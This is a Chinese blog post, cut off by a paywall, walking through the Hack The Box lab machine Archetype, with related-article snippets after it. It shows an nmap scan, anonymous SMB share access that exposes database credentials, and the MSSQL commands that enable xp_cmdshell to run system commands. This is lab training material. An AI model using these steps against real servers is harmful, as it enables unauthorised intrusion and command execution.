[渗透测试]HTB-Archetype

最新推荐文章于 2025-06-01 07:28:19 发布

hedianshui888

最新推荐文章于 2025-06-01 07:28:19 发布

阅读量2.3k

点赞数

分类专栏：网络安全文章标签：安全 linux web安全

本文链接：https://blog.youkuaiyun.com/weixin_47224111/article/details/121288444

版权

0x01 信息收集

在这里插入图片描述

使用nmap扫描目标
nmap -Pn -sC 10.129.61.193 //-sC 使用脚本扫描 -Pn 跳过主机发现，直接扫描端口

在这里插入图片描述

0x02 对445端口进行测试

Smbclient 是linux上用于连接smb服务的工具
smbclient -L // -L 列出所有共享用户
在这里插入图片描述
存在 backups 匿名登录
smbclient -N //10.129.61.193/backups/ 登录成功

发现数据库账号密码

0x03 对1433端口进行测试

在这里插入图片描述

select is_srvrolemember(‘sysadmin’)
返回了 1 说明是sa权限可以使用拓展存储命令执行

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1 reconfigure;
xp_cmdshell "whoami"

这里需要获取一个操作系统shell更加方便我们操作

有很多种办法
powercat

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hedianshui888

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[渗透测试]HTB靶机-Archetype

Y4tacker的博客

07-17

1366

文章目录工具介绍smbclientpsexecArchetype 工具介绍 smbclient Smbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。参数：网络资源网络资源的格式为//服务器名称/资源分享名称。密码输入存取网络资源所需的密码。 -B 传送广播数据包时所用的IP地址。 -d< 排错层级> 指定记录文件所记载事件的详细程度。 -E 将信息送到标准错误输出设备。 -h 显示帮助。 -i< 范围> 设置NetBIOS名称范围

HTB靶机之Oopsie

m0_46412682的博客

09-01

1651

HTB靶机之Oopsie 1、VPN connection 2、信息收集 ①masscan端口扫描 sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28 ②nmap扫描端口对应的服务 nmap -sC -sV 10.10.10.28 开放了22端口和80端口操作系统是：linux 3、访问80端口没有什么可以点或者打开的地方，拉到最下面，有一条提示信息Please login to get access to the s

参与评论您还未登录，请先登录后发表或查看评论

HTB Hack The Box -- Archetype

Gh0st_1n_The_Shell的博客

09-06

373

要是不知道怎么连接htb的靶机可以查看我的文章如何连接Hack The Box的靶机？博客园如何连接Hack The Box的靶机？优快云信息收集先用nmap扫描对方开放了什么服务攻击首先比较引人注意的是 445smb服务，1433SQLServer服务看到445服务就想到永恒之蓝漏洞，然而在这里应该是windows server的版本比较高（2019），所以应该是已经打了永恒之蓝的补丁我们可以登陆一下smb服务，看看是否需要密码登录，没有经过权限配置可能默认允许所有人无需身份认证来匿名

HTB_Start Point_Tier2——Archetype

m0_46607055的博客

08-21

1688

htb靶场Archetype 从smb空口令到提权

HTB-Archetype(winPEAS枚举工具，mssql xp_cmdshell)

weixin_58038441的博客

09-10

1472

我们介绍了impacket中用于sql server连接工具 mssqlcilent，以及winPEAS枚举权限提升工具，以及powershell中下载文件，nc转移管理权，mssql 命令函数 xp_cmdshell 及开放命令。

HTB：Archetype[WriteUP]

如有错误感谢斧正

09-30

886

同理：我们上文用python开启的http.server服务没关闭，直接将winPEAS放置在同目录进行上传。找到sql_svc文件夹，接下来使用wget将nc从本地上传至该目录下的Downloads中。到了这一题直接跳跃到了提权，但是我们还没有拿到low权shell，所以继续getshell。archetype\sql_svc，代表xp_cmdshell成功执行了命令。将nc放置在同目录下，开启http.server服务并输入好端口。使用此命令将枚举出该samba服务器中的所有共享对象，可见。

Hack The Box - STARTING POINT

小小郭的博客

03-06

2626

Hack The Box - STARTING POINT

HTB TIER 2 Archetype wp

qq_40952713的博客

03-25

1292

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录所用工具一、信息收集二、寻找falg1.使用mssqlclient.py连接到mssql2.拿shell3.提权总结所用工具 nmap mssqlclient.py psexec.py nc.exe metasploit winPEAS.bat 工具下载链接在文中一、信息收集使用nmap对目标靶机进行扫描 nmap -A -T4 -v 10.129.171.38 发现目标主机开启了smb、sql server服务尝试.

HTB_Archetype靶机之sqlserver提权

网络安全学习

07-16

1793

第一次接触sqlserver数据库提权

0x01-StartingPoint-Archetype

0pr

04-15

1334

HTB-Archetype Article in company with a video makes a perfect learning experience. Today, I am deliverying this write up of the first ever machine that I am going to hack. I am what people call noob! ...

【HTB系列】靶机Bitlab的渗透测试

大方子

01-23

2970

https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note

渗透之——PowerShell基本命令和绕过权限执行

冰河的专栏

01-07

6100

转载请注明出处：https://blog.youkuaiyun.com/l1028386804/article/details/86029412 一、基本命令以文件操作为例 1.新建目录 New-Item whitecellclub-ItemType Directory 2.新建文件 New-Item light.txt-ItemType File 3.删除目录 Remove-Item...

PowerShell常用命令及使用方法

最新发布

静水深流

06-01

761

本文探讨了应用程序安全性的核心价值和Spring Security的架构基础。安全性需要根据数据敏感度分级实施，漏洞会导致多维损失（经济、信誉、法律）。通过典型案例分析，论证了防御投入远低于漏洞修复成本。Spring Security采用过滤器链和认证管理器架构，支持密码编码器演进和最小权限原则，提供表单登录与HTTP Basic等认证方式。系统设计应遵循"默认拒绝"原则，通过分层防护保障关键系统安全。

联软SDP+安渡：收敛暴露面从生产网自动取数安全高效

leagsoft_1003的博客

05-28

1365

制造业网络安全面临网络隔离与数据流通的矛盾。为解决供应商跨网协作中的安全风险和管理痛点，联软推出安渡SDP解决方案：通过专用加密隧道实现安全访问，采用IP协议栈隔离、数据指令分离等创新技术，在不开放网络端口的情况下完成自动化数据摆渡。该方案既保障了文件传输的安全性，又提高了办公效率，实现了网络安全防护与业务便捷性的统一。典型应用于BOM系统审批后的图纸自动传输场景，有效规避U盘拷贝、即时通讯等传统方式的安全隐患。

变焦位移计：机器视觉如何克服人工疲劳与主观影响？精准对结构安全实时监测

weixin_43963569的博客

05-30

1135

摘要：变焦视觉位移监测相比传统人工监测具有显著优势。在精度上，自动化监测可达0.01mm，而人工监测受主观影响，精度仅几毫米。自动化可实现24小时高频监测，人工则耗时且滞后。自动化数据实时上传，真实可靠；人工数据易受人为干预。虽然自动化前期投入高，但长期成本效益更优。自动化监测在连续性、数据呈现等方面也优于人工监测。尽管人工监测在特定场景仍有价值，但自动化监测已成为行业发展趋势。

Google car key：安全、便捷的汽车解锁新选择

2401_86745636的博客

05-30

510

对于支持NFC的Android手机，您需要将手机贴近车门把手才能完成解锁/上锁操作，启动车辆时也需将手机放置在指定感应区。而采用UWB技术的体验则更为智能：只需随身携带支持UWB的手机即可实现"无感操作"——靠近车辆时自动解锁，离开时自动上锁，进入车内后无需任何操作就能直接启动引擎，整个过程完全无需掏出手机。此时只需将设备贴近车门的NFC读取器，即可完成车辆解锁与启动操作。Google car key作为一项创新的汽车解锁技术，通过兼容的Android手机与特定车型的集成，实现了手机作为车钥匙的便捷功能。

HTB-Solutions: 解决方案的集合与实践指南

然而，如果我们假设HTB-Solutions-main包含了“HTB-Solutions”相关的主文件或代码，那么它可能包含了渗透测试脚本、漏洞利用代码、配置文件或者是渗透测试计划和总结报告等。在网络安全领域，黑客工具包平台的...